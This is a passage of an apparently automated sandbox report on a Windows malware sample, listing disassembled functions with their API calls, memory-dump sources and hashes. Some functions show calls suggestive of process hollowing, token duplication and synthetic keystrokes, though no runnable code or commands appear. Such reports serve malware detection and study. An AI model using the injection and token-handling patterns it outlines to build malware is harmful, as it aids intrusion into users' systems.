                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                      • String ID:
                                                      • API String ID: 2800547568-0
                                                      • Opcode ID: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                                                      • Instruction ID: d9443fdd3ee0a3059f5d17ec53abbfe2105cc8a5d10ddad395bff0ae1f283336
                                                      • Opcode Fuzzy Hash: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                                                      • Instruction Fuzzy Hash: EEF0F6308417019AD710AB7588027EF37A09F41379F22864FA061961D1C73C85C29B5D
                                                      Function 00414FE2 Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • __lock_file.LIBCMT ref: 00415012
                                                      • __ftell_nolock.LIBCMT ref: 0041501F
                                                        • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: __ftell_nolock__getptd_noexit__lock_file
                                                      • String ID:
                                                      • API String ID: 2999321469-0
                                                      • Opcode ID: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                                                      • Instruction ID: e3e7bc223609ce985a1750c66bb322057640979a4505571362f253753ce4bf01
                                                      • Opcode Fuzzy Hash: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                                                      • Instruction Fuzzy Hash: 64F03030900605EADB107FB5DD027EE3B70AF443A8F20825BB0259A0E1DB7C8AC29A59
                                                      Function 03F72B45 Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateProcessW.KERNELBASE(?,00000000), ref: 03F73303
                                                      • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03F73399
                                                      • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03F733BB
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1781368925.0000000003F71000.00000040.00000020.00020000.00000000.sdmp, Offset: 03F71000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_3f71000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                      • String ID:
                                                      • API String ID: 2438371351-0
                                                      • Opcode ID: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                                                      • Instruction ID: 17a547fcb43b3ba6967ab6d29d810bad0e7354a8920aa873a302e746c8b71494
                                                      • Opcode Fuzzy Hash: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                                                      • Instruction Fuzzy Hash: 9E12CF24E24658C6EB24DF64D8507DEB232EF68300F1090E9910DEB7A5E77A4F91CF5A
                                                      Function 00402F00 Relevance: 1.6, APIs: 1, Instructions: 104COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: _memmove
                                                      • String ID:
                                                      • API String ID: 4104443479-0
                                                      • Opcode ID: 224a1bccd0668171228bffd00b4e167e84225026459a60d9317a1c29c8a59c26
                                                      • Instruction ID: 6397ebbfaf442e519c955e074037b65107783079284990db5ef0c3dd021860ed
                                                      • Opcode Fuzzy Hash: 224a1bccd0668171228bffd00b4e167e84225026459a60d9317a1c29c8a59c26
                                                      • Instruction Fuzzy Hash: 36317371E00209EBDF009F52E9866AEFBF4FF40740F2189BED855E2650E7389990D759
                                                      Function 00402780 Relevance: 1.6, APIs: 1, Instructions: 101COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: _memmove
                                                      • String ID:
                                                      • API String ID: 4104443479-0
                                                      • Opcode ID: 8b2818c8434b9a070bb7a9b9dd55d4aa8d61190f7c46d4f62081b3e0e63eee4f
                                                      • Instruction ID: 412edbf2df7bf8c64f36b821a583ca4e96a0f18e0b9aed18a790d0e499aeb9a1
                                                      • Opcode Fuzzy Hash: 8b2818c8434b9a070bb7a9b9dd55d4aa8d61190f7c46d4f62081b3e0e63eee4f
                                                      • Instruction Fuzzy Hash: 60319CB9600A21EFC714DF19C580A62F7E0FF08310B14C57ADA89CB795E774E892CB99
                                                      Function 00410CFC Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: ProtectVirtual
                                                      • String ID:
                                                      • API String ID: 544645111-0
                                                      • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                      • Instruction ID: 21b87f0337b3904faf2e49e7d89a80b8c5538d611ad57d97d778efbd48141229
                                                      • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                      • Instruction Fuzzy Hash: 8131F770A00105DBC718DF88E590AAAF7B1FB49310B6486A6E409CF355DB78EDC1CBD9
                                                      Function 00408F40 Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e5559574dc10eca8e97d8025a500eef8ee7d185e3c773571fee143e03780f234
                                                      • Instruction ID: 427b4a632c312742ac0951887501238d3178a51c37fde1d0fd35c98815df3d2a
                                                      • Opcode Fuzzy Hash: e5559574dc10eca8e97d8025a500eef8ee7d185e3c773571fee143e03780f234
                                                      • Instruction Fuzzy Hash: 21119674200201ABDB249F36D984E26B3A5AF45304B244D2FF9C5D7790DB7CE881DB5E
                                                      Function 00444AF8 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                      • _memmove.LIBCMT ref: 00444B34
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: _malloc_memmove
                                                      • String ID:
                                                      • API String ID: 1183979061-0
                                                      • Opcode ID: 5456aa698ccb66e472ad2dc6bdf94112e2600af6ff6d776df7a489d92d6f0097
                                                      • Instruction ID: 1ab6fe9f530497837eb86deb75815884a9af672873ccf792f11a5e6f6739e6df
                                                      • Opcode Fuzzy Hash: 5456aa698ccb66e472ad2dc6bdf94112e2600af6ff6d776df7a489d92d6f0097
                                                      • Instruction Fuzzy Hash: E0016D3220410AAFD714DF2CC882DA7B3EDEF88318711492FE996C7251EA74F9508B94
                                                      Function 00414C76 Relevance: 1.5, APIs: 1, Instructions: 40COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: __lock_file
                                                      • String ID:
                                                      • API String ID: 3031932315-0
                                                      • Opcode ID: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                                                      • Instruction ID: 324047821ed349453e17c5e7f52af34d31ade4ebcb64e32b23ce3c6ad3b356a0
                                                      • Opcode Fuzzy Hash: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                                                      • Instruction Fuzzy Hash: FF011E71801219EBCF21AFA5C8028DF7B71AF44764F11851BF824551A1E7398AE2DBD9
                                                      Function 00479714 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00479500: VariantInit.OLEAUT32(?), ref: 0047950F
                                                        • Part of subcall function 00437063: VariantClear.OLEAUT32(00479459), ref: 0043706B
                                                        • Part of subcall function 00437063: VariantCopy.OLEAUT32(00479459,00470E7C), ref: 00437076
                                                      • VariantClear.OLEAUT32(?), ref: 0047973E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Variant$Clear$CopyInit
                                                      • String ID:
                                                      • API String ID: 24293632-0
                                                      • Opcode ID: 5d7337fccf444792d50b64af1a389de1ebb3e8953e67bf22bf250c0f7ac223aa
                                                      • Instruction ID: ce75823fad5ab463881ca656a32c684f825172ff923cb7d6b6c05433a05b9d1b
                                                      • Opcode Fuzzy Hash: 5d7337fccf444792d50b64af1a389de1ebb3e8953e67bf22bf250c0f7ac223aa
                                                      • Instruction Fuzzy Hash: C4E012B251010C6B8704FBFDDDC6CAFB7BCFB18204B80495DB919A3142EA75A914C7E9
                                                      Function 004149C2 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: __wfsopen
                                                      • String ID:
                                                      • API String ID: 197181222-0
                                                      • Opcode ID: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                                                      • Instruction ID: b34ddb7a850719c89311ce964fc9f65e9e9400c6a390d5c1cbb008c3125e494a
                                                      • Opcode Fuzzy Hash: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                                                      • Instruction Fuzzy Hash: 82C092B244020C77CF112A93EC02F9A3F1E9BC0764F058021FB1C1A162AA77EAA19689
                                                      Function 03F73B48 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • Sleep.KERNELBASE(000001F4), ref: 03F73B59
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1781368925.0000000003F71000.00000040.00000020.00020000.00000000.sdmp, Offset: 03F71000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_3f71000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Sleep
                                                      • String ID:
                                                      • API String ID: 3472027048-0
                                                      • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                      • Instruction ID: 119efb54a87d76c46b921b9b4d8e05074723f6d47db4a686228af9d5dc84ad74
                                                      • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                      • Instruction Fuzzy Hash: 9CE0E67494010DEFDB00DFB8D54D69D7BB4EF04302F1002A1FD01D2280D6309D509A62

                                                      Non-executed Functions

                                                      Function 0047C81C Relevance: 74.2, APIs: 40, Strings: 2, Instructions: 674windowkeyboardCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C8E1
                                                      • DefDlgProcW.USER32(?,0000004E,?,?), ref: 0047C8FC
                                                      • GetKeyState.USER32(00000011), ref: 0047C92D
                                                      • GetKeyState.USER32(00000009), ref: 0047C936
                                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C949
                                                      • GetKeyState.USER32(00000010), ref: 0047C953
                                                      • GetWindowLongW.USER32(00000002,000000F0), ref: 0047C967
                                                      • SendMessageW.USER32(00000002,0000110A,00000009,00000000), ref: 0047C993
                                                      • SendMessageW.USER32(00000002,0000113E,00000000,?), ref: 0047C9B6
                                                      • _wcsncpy.LIBCMT ref: 0047CA29
                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0047CA5A
                                                      • SendMessageW.USER32 ref: 0047CA7F
                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 0047CADF
                                                      • SendMessageW.USER32(?,00001030,?,0047EA68), ref: 0047CB84
                                                      • ImageList_SetDragCursorImage.COMCTL32(00AB1F10,00000000,00000000,00000000), ref: 0047CB9B
                                                      • ImageList_BeginDrag.COMCTL32(00AB1F10,00000000,000000F8,000000F0), ref: 0047CBAC
                                                      • SetCapture.USER32(?), ref: 0047CBB6
                                                      • ClientToScreen.USER32(?,?), ref: 0047CC17
                                                      • ImageList_DragEnter.COMCTL32(00000000,?,?,?,?), ref: 0047CC26
                                                      • ReleaseCapture.USER32 ref: 0047CC3A
                                                      • GetCursorPos.USER32(?), ref: 0047CC72
                                                      • ScreenToClient.USER32(?,?), ref: 0047CC80
                                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CCE6
                                                      • SendMessageW.USER32 ref: 0047CD12
                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CD53
                                                      • SendMessageW.USER32 ref: 0047CD80
                                                      • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0047CD99
                                                      • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0047CDAA
                                                      • GetCursorPos.USER32(?), ref: 0047CDC8
                                                      • ScreenToClient.USER32(?,?), ref: 0047CDD6
                                                      • GetParent.USER32(00000000), ref: 0047CDF7
                                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CE60
                                                      • SendMessageW.USER32 ref: 0047CE93
                                                      • ClientToScreen.USER32(?,?), ref: 0047CEEE
                                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,00A61BD8,00000000,?,?,?,?), ref: 0047CF1C
                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CF46
                                                      • SendMessageW.USER32 ref: 0047CF6B
                                                      • ClientToScreen.USER32(?,?), ref: 0047CFB5
                                                      • TrackPopupMenuEx.USER32(?,00000080,?,?,00A61BD8,00000000,?,?,?,?), ref: 0047CFE6
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 0047D086
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$ClientScreen$Image$CursorDragList_State$CaptureLongMenuPopupTrackWindow$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                      • String ID: @GUI_DRAGID$F
                                                      • API String ID: 3100379633-4164748364
                                                      • Opcode ID: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                                                      • Instruction ID: 980357f173c9be8e312ccaa606797ee7157b6525bda81ee0817efdfc4c954517
                                                      • Opcode Fuzzy Hash: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                                                      • Instruction Fuzzy Hash: F842AD706043419FD714DF28C884FABB7A5FF89700F14865EFA489B291C7B8E846CB5A
                                                      Function 00434418 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 133keyboardthreadwindowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetForegroundWindow.USER32 ref: 00434420
                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00434446
                                                      • IsIconic.USER32(?), ref: 0043444F
                                                      • ShowWindow.USER32(?,00000009), ref: 0043445C
                                                      • SetForegroundWindow.USER32(?), ref: 0043446A
                                                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434481
                                                      • GetCurrentThreadId.KERNEL32 ref: 00434485
                                                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434493
                                                      • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A2
                                                      • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A8
                                                      • AttachThreadInput.USER32(00000000,?,00000001), ref: 004344B1
                                                      • SetForegroundWindow.USER32(00000000), ref: 004344B7
                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344C6
                                                      • keybd_event.USER32(00000012,00000000), ref: 004344CF
                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344DD
                                                      • keybd_event.USER32(00000012,00000000), ref: 004344E6
                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344F4
                                                      • keybd_event.USER32(00000012,00000000), ref: 004344FD
                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043450B
                                                      • keybd_event.USER32(00000012,00000000), ref: 00434514
                                                      • SetForegroundWindow.USER32(00000000), ref: 0043451E
                                                      • AttachThreadInput.USER32(00000000,?,00000000), ref: 0043453F
                                                      • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434545
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: ThreadWindow$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                                                      • String ID: Shell_TrayWnd
                                                      • API String ID: 2889586943-2988720461
                                                      • Opcode ID: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                                                      • Instruction ID: 0b42b206f44700a00bd4aa1610e9651ae8f7722fee000eb3c659fd44b6abead8
                                                      • Opcode Fuzzy Hash: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                                                      • Instruction Fuzzy Hash: AD416272640218BFE7205BA4DE4AFBE7B6CDB58B11F10442EFA01EA1D0D6F458419BA9
                                                      Function 00446313 Relevance: 37.0, APIs: 17, Strings: 4, Instructions: 234processCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 0044638E
                                                      • CloseHandle.KERNEL32(?), ref: 004463A0
                                                      • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004463B8
                                                      • GetProcessWindowStation.USER32 ref: 004463D1
                                                      • SetProcessWindowStation.USER32(00000000), ref: 004463DB
                                                      • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004463F7
                                                      • _wcslen.LIBCMT ref: 00446498
                                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                      • _wcsncpy.LIBCMT ref: 004464C0
                                                      • LoadUserProfileW.USERENV(?,00000020), ref: 004464D9
                                                      • CreateEnvironmentBlock.USERENV(?,?,00000000), ref: 004464F3
                                                      • CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?,?,?,000F01FF,00000400), ref: 00446522
                                                      • UnloadUserProfile.USERENV(?,?), ref: 00446555
